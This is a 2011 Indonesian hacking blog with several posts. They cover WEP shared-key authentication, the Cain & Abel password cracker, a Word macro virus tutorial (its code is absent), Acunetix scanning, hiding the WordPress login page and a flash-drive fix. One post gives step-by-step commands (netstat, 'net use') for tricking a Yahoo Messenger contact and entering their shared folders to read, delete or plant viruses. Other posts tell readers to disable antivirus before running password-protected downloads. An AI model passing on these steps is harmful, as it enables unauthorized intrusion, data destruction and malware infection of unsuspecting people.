Berbeda dengan Open System Authentication, Shared Key Authentication memaksa client untuk mengetahui terlebih dahulu kode rahasia/passphare sebelum mengijinkannya terkoneksi dengan AP. Idenya adalah mengurangi data sampah.
“Jika Anda tidak mengetahui WEP Key, toh akan sia-sia saja Anda saya ijinkan masuk jadi lebih baik saya cegah dulu di pintu depan”, demikian kira-kira pikir AP.



Pada proses Authentication ini, Shared Key akan “meminjam” WEP Key yang digunakan pada proses enkripsi WEP untuk melakukan pengecekan awal. Karena Shared Key Authentication “meminjam” key yang digunakan oleh level keamanan WEP, Anda harus mengaktifkan WEP untuk menggunakan Shared Key Authentication.
Untuk menghindari aksi sniffing, pengecekan WEP Key pada proses shared key authentication dilakukan dengan metode Challenge and Response sehingga tidak ada proses transfer password/WEP Key di dalam kabel (lihat box”Bagaimana Challenge dan Response Bekerja).

Bagaimana Chalienge dan Response Bekerja

Salah satu cara yang sangat disukai oleh hacker untuk mendapatkan username dan password adalah dengan mengintip di kabel jaringan. Username dan password yang dikirim melalui kabel sangat mudah untuk didapatkan tanpa perlu melakukan penyerangan secara langsung ke komputer korban.
Proses enkripsi terhadap password terbukti tidak efektif melawan aksi para hacker yang bisa melakukan proses dekripsi karena alasan kelemahan dari algoritma enkripsi selain itu masih banyak cara lain yang bisa digunakan oleh hacker. Untuk itu, para insinyur merancang suatu metode dimana password tidak lagi dikirim melalui kabel jaringan sehingga hasil yang di “intip” oleh hacker trunjadi tidak berguna.




Metode yang dinamakan Challenge and Response ini menggantikan pengiriman password dengan pertanyaan yang harus dijawab berdasarkan password yang diketahui. Prosesnya sebagai berikut:
  1. Client meminta i jin kepada server untuk melakukan koneksi
  2. Server akan mengirimkan sebuah string yang dibuat secara acak dan mengirimkannya kepada client. Server berkata kepada client”OK client, saya memberikan Anda sebuah string/nilai yang harus Anda enkripsikan dengan password Anda. Setelah dienkripsil an dengan password Anda, kirimkanlah jawabannya ke saya”
  3. Client akan melakukan enkripsi antara string/nilai yang diberikan oleh server dengan password yang diketahuinya. Hasil enkripsi ini kemudian dikirimkan kembali ke server
  4. Server akan melakukan proses dekripsi dan membandingkan hasilnya. Bila hasil dekripsi dari client menghasilkan string/nilai yang sama dengan string/nilai yang dikirimkan oleh server, berarti client mengetahui password yang benar.


TEKNIK HACKING MENJEBOL PASSWORD WEBSITE, EMAIL & JARINGAN LAINNYA MENGGUNAKAN PROGRAM CAIN & ABEL

Cain & Abel adalah pemulihan password utilitas yang dapat memudahkan untuk pemulihan  berbagai jenis password jaringan, cracking password terenkripsi menggunakan Dictionary, Brute-Force dan serangan Kriptoanalisis, rekaman percakapan VoIP, mebongkar decoding password, mengungkapkan kotak password, mengungkap password cache . dan menganalisis protokol routing  Ini mencakup beberapa aspek keamanan / hadir  juga kelemahan dalam standar protokol, metode otentikasi dan mekanisme caching, tujuan utamanya adalah pemulihan  password dan kredensial dari berbagai sumber, namun juga beberapa “non standard” utilitas untuk Microsoft pengguna Windows.
 Cain & Abel telah dikembangkan dengan harapan bahwa itu akan berguna bagi administrator jaringan, guru, konsultan keamanan / profesional, staf forensik, vendor keamanan perangkat lunak, penetration tester profesional dan orang lain yang berencana untuk menggunakannya untuk alasan etis. Penulis tidak akan membantu atau mendukung aktivitas ilegal dilakukan dengan program ini.
Jadi penulis  memperingatkan bahwa ada kemungkinan bahwa Anda akan menyebabkan kerusakan dan / atau kehilangan data menggunakan software ini dan apapun yang Anda lakukan penulis tidak bertanggung jawab atas kerusakan atau hilangnya data. Bacalah Perjanjian Lisensi termasuk dalam program sebelum menggunakannya. Versi terbaru lebih cepat dan berisi banyak fitur baru seperti ARP (Arp Poison Routing) yang memungkinkan sniffing di LAN diaktifkan dan melakukan serangan yang tersembunyi. Sniffer dalam versi ini juga dapat menganalisa protokol terenkripsi seperti SSH-1 dan HTTPS, dan berisi filter untuk menangkap mandat dari berbagai mekanisme otentikasi.
Versi baru ini juga memonitor protokol routing yang kapal otentikasi dan extractors rute dan brute force cracker untuk semua algoritma phising umum dan untuk otentikasi yang lebih  spesifik, password , serangan kriptanalisis, Decoder password dan beberapa utilitas tidak begitu umum yang terkait dengan jaringan dan sistem keamanan.
Catatan : Sebelum meng-Install program Cain & Abel ini sebaiknya Anda me-nonaktifkan program Anti Viursnya, karena Anti vurs akan menganggap program Cain & Abel ini adalah sebuah virus. . Hal ini disebut ‘positif palsu’. Yang positif palsu Istilah digunakan ketika perangkat lunak antivirus salah mengklasifikasikan file (ofensif) berbahaya sebagai virus. Deteksi yang salah mungkin karena heuristik atau ke virus signature tidak benar dalam database. [Masalah serupa dapat terjadi dengan antitrojan atau perangkat lunak antispyware.] Untuk menginstall program Cain & Abel sebaiknya Anda Disable Program Anti Viursnya!! Agar proses penginstalannya berjalan lacar dan program tidak dianggap virus positif palsu??? Oce bro...

Oklah sebelum memulai aksi ne...ini ane kasih program chain able dan article cara penggunaanya...
silahkan DOWNLOAD DISINI MASBRO
password RAR : boeimcyber

Semoga bermanfaat mass broo,, ^_^

CARA MEMBUAT VIRUS MACRO MENGGUNAKAN MICROSOFT WORD

 esemenehh x ne ane maw coba jadi virus maker masbroo..wkakwkwakw..
mana taw ntr bisa di cari orang untuk buat virus..hehehe..
oklah langsung aja ne massbroo..ane kasih tutornya langsung..
Virus macro merupakan virus yang dibuat dalam bahasa pemrograman visual basic macro di Microsoft Office. Kita ambil contoh, virus macro Word.
CARA MEMBUAT VIRUS MACRO
  1. Buka Ms.Word (hanya contoh)
  2. buka tools > Macro> Visual Basic Editor
Gambar 1. Langkah Menujur Macro Visual Basic Editor
3.  Akan muncul gambar di bawah
Gambar 2. Layout Macro Visual Basic Editor
4.  Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.
Gambar 3. Layout Source Code Virus Macro

Sekarang muncul pertanyaan! Source yang bagaimana yang harus diketik???
Tenang, Penulis dah siapkan kok sourcenya. Makan neh source code!


 
SELAMAT MENCOBA MAS BROOOOOOOOOOOOOOOO!!!!

Kamis, 08 Desember 2011

mencari kelemahan website menggunakan Acunetix Web Vulnerability Scanner

keamaan web memang sangat penting untuk menjamin kelangsungan website kita agar tetap online dan banyak di kunjungi oleh orang lain, namun tidak menutup kemungkinan website anda akan di susupi hacker atau orang-orang iseng alias lamer yang hanya sekedar test ilmu atau memang bermaksud jahat dengan cara-cara dan tingkat kemampuan yang mereka miliki.
Nah itulah sebabnya keamanan website kita sangat penting di perhatikan agar terhindar dari serangan atau deface untuk kebaikan kita.
banyak cara yang dapat kita lakukan untuk audit website kita jika kita memang tidak punya basic ke ilmuan untuk mengamankan secara manual.

salah satunya dapat kita lakukan menggunakan software yang akan kita bahas pada session ini yaitu menggunakan acunetix Web Vulnerability Scanner.
software ini dapat kita coba offline maupun online, pada kesempatan kali ini kita akan coba pada posisi offline karena software ini sangat mudah di gunakan untuk kita yang awam dengan testing security web.

1. pertama anda dapat mendowload softwarenya DISINI
   Password Rar : boeimcyber
2. selanjutnya anda jalankan software acunetix ini kemudian klik File ==>> New

3. klik webscanner

4. Masukkan URL atau alamat web yang akan anda scan di kolom Start URL

5. Pilih paket profile yang ingin anda jalankan pada kolom profile, sebaiknya anda pilih default saja karena semua paket akan di jalankan
6. kemudian klik start di sebelah kanan kolom profile untuk menjalankan scanner.
7. saya coba testing scan website joomla dengan profile blind_injection di localhost saya dengan path http://www.localhost/joomlax/
berikut skrinsut hasilnya:

pada lingkaran bulat sebelah kiri menunjukkan hasil scan terhadap website joomla, sedangkan pada lingkaran sebelah kanan menunjukkan informasi scan dan tingkat vulnerability (kerapuhan) website yang di temukan hasil scan software ini.
8. pada testing blind_injection di temukan 2 notifikasi yang menyatakan ada bagian yang cukup berbahaya/vulnerable (lihat bagian lingkaran sebelah kiri) , anda tinggal arahkan kursor anda kebagian tersebut. secara otomatis di bagian sebelah kanan (lingkaran sebelah kanan) terdapat penjelasan deskripsi dari vulnerable itu dan cara menangani nya yang sudah di persiapkan oleh tim acunetix.
 Semoga Bermanfaat..
:)

Rabu, 07 Desember 2011

Hack Komputer Orang Dengan YM!

 pernah gak terpikir untuk masok ke data2 komputer orang,.?
gak pernah..? mati aja udah lo...wkwakawkakwkwa...
just kidding bro..namanya juga belajar2...
ok lahh kali ne ane share kan dikit pengalaman ane masok ke data komputer orang tanpa sepengetahuan dya..ahahahha
lanngsung aja ..
Langkah pertama..modal-nya kita harus tahu IP target yang ingin kita serang terlebih dahulu, dengan cara:

1. login YM
2. Ajak target untuk PM an
3. Paksa target terima file kamu..entah kirim apa kek..foto atau data apa aja (buat ngulur waktu)

kalau target sudah terpancing...lakukan Langkah kedua:

1.Klik start, lanjutkan dengan mengklik RUn
2. Ketik 'cmd' (tidak pakai tanda petik) akhiri dengan OK
3. Langkah selanjutnya, ketik : 'Netstat -an' (tidak pakai tanda petik) lanjutkan dengan OK
4. nanti akan muncul banyak keterangan di command prompt kamu...

lalu cari tanda 5050 <,sebelum tanda ini, tertulis angka beberapa digit...itulah IP target yg saat ini sedang menerima file pancingan dari kamu tadi.

Ip dah dapat...tinggal eksekusi nih: Halaman Command Promt jangan di tutup dulu.

Untuk eksekusi..neh dibutuhkan keberuntungan jika anda ingin mengintip file yang disimpan target di komputernya. Hehe...hehe...ketawa terus..awali dengan senyum yah..biar berhasil bro. Yo'i, kalau dah dapat...masih di halaman command promt kamu tadi:

1. ketik : ''net use: h \\ (Ip target)\shareddocs'' <

Kalau anda berhasil ..maka akan ada keterangan share docs succes..(Kalau sukses...silahkan anda buka drive anda di My Computer..maka akan ada tambahan drive baru..itu adalah drive dari komputer target. Karna anda telah terhubung dengan komputer target, jadi silahkan intip semua file yang tersimpan di komputernya..tentu semua tersedia dikomputer anda skrg...mau hapus..silahkan..mau nambah silahkan..mau nitip Virus..monggo...hehe.dah dikuasai kok..)

Catatan: Kalau keterangan error..maka sebenarnya target memasang security yang cukup,jadi silahkan pikirkan cara lain.


Keberuntungan adalah awal dari keberhasilan...iya kali? soalnya kalau gk beruntung..gmn mau sukses...hhehwhehe


Selamat mencoba deh.
semoga bermanfaat..

Aman kan Wordpress anda dengan hide admin page

okelah ane akan postingkan penemuan ane  tadi di mbah google,..
jalan2 kerumah mbah google..eh rupanya ada trik yang bagus ne..
ya ane curi aja lah..wakawkwakwakw
:)
langsung aja ke pokok pembahasannya..

Buka wp-login.php , trus coaps sourcenya ke notepad
replace semua kata “wp-login.php” (tanpa tanda kutip) dengan nama file yang “boeim.php” ..nama dapat terserah ya... replace semua script yang udah di ubah tadi ke wp-login php terus save

Next step, rename wp-login.php tadi dengan nama yang ente pilihkan tadi misalnya boeim.php .

kalo udah
coba cek ..http://webkamu.com/wp-admin pasti hasilnya 404 not found hahaha klo begitu kita udah berhasil...

akses panel admin ente dengan file login yang telah ente modif namanya sebelumnya ...

http://webkamu.com/boeim.php

coba login... berhasil bukan ?
sekarang coba logout ..
error ..
lalu cara untuk mengatasinya silahkan ente Buka folder “wp-admin” lalu buka admin-header.php, fine “wp_logout_url()” perhatikan source line di bawah ini


Code:
$links[15] = ‘| <a href=”‘ . wp_logout_url() . ‘” title=”‘ . __(‘Log Out’) . ‘”>’ . __(‘Log Out’) . ‘</a>’;

nah, ganti wp_logout_url() menjadi variable php seperti $kampret, ato $indonesia, ato terserah lo dah, kalo disini,
di sini kt bikin contoh nya $indonesia

nah diatas line terserbut kamu tambain dah,

Code:
$indonesia = wp_logout_url();

$indonesia = preg_replace(“/wp-login.php/”, “mct.php”, $indonesia);

sekarang coba kamu login..

heheh
sumber nya : fasthacker

Selasa, 06 Desember 2011

Cara memperbaiki flashdik yang rusak

Selamat pagi,siank,malamkawan2 cyber Semua..!!
waduhh...udah lama bah ane gak posting...
huhuhu...okok lah..kali ne si boeim pengen posting nee...tuh judulnya di atas...mungkin teman2 pernah ngalami kejadian flashdisk yang gak kebaca kan..? nah..contohnya ketika flashdisk di colokkan malah timbul please insert a disk. kayak ini penampakannya ..

jiaaahhhh....sempat bingung jugaa...hadehh...ane ngalamin tuh ..cari2 solusinya kesana kemari...ehh akhirnya nemu...makasih Mbah google...hahahha..

ok lah tanpa panjang lebar ,,waktu dan tempatnya saya persilahkan dengan segala hormat...wkakwakkawaw...kayak maw ceramah aja...ingat waktu upacara sekolah dolo jadinya..ahahaha
nah ini cara kerjanya ane kasih..
Cara kerja software :
  • Download softwarenya DISNI
  • Colokkan flashdisk
  • Jalankan software maka akan lansung mendeteksi device driver usb flashdisk
  • Selanjutnya klik Update.
  • Tunggu proses penggantian drivernya selesai dan flashdisk bisa digunakan kembali.
Password RAR : boeimcyber
Sangat mudah dan simple sekali khan. Semoga cara memperbaiki Flashdisk yang rusak diatas bisa membantu buat teman-teman semua yang mungkin mengalami kerusakan flashdisk.

 
./BoeimCyber © 2011 Templates | Boeim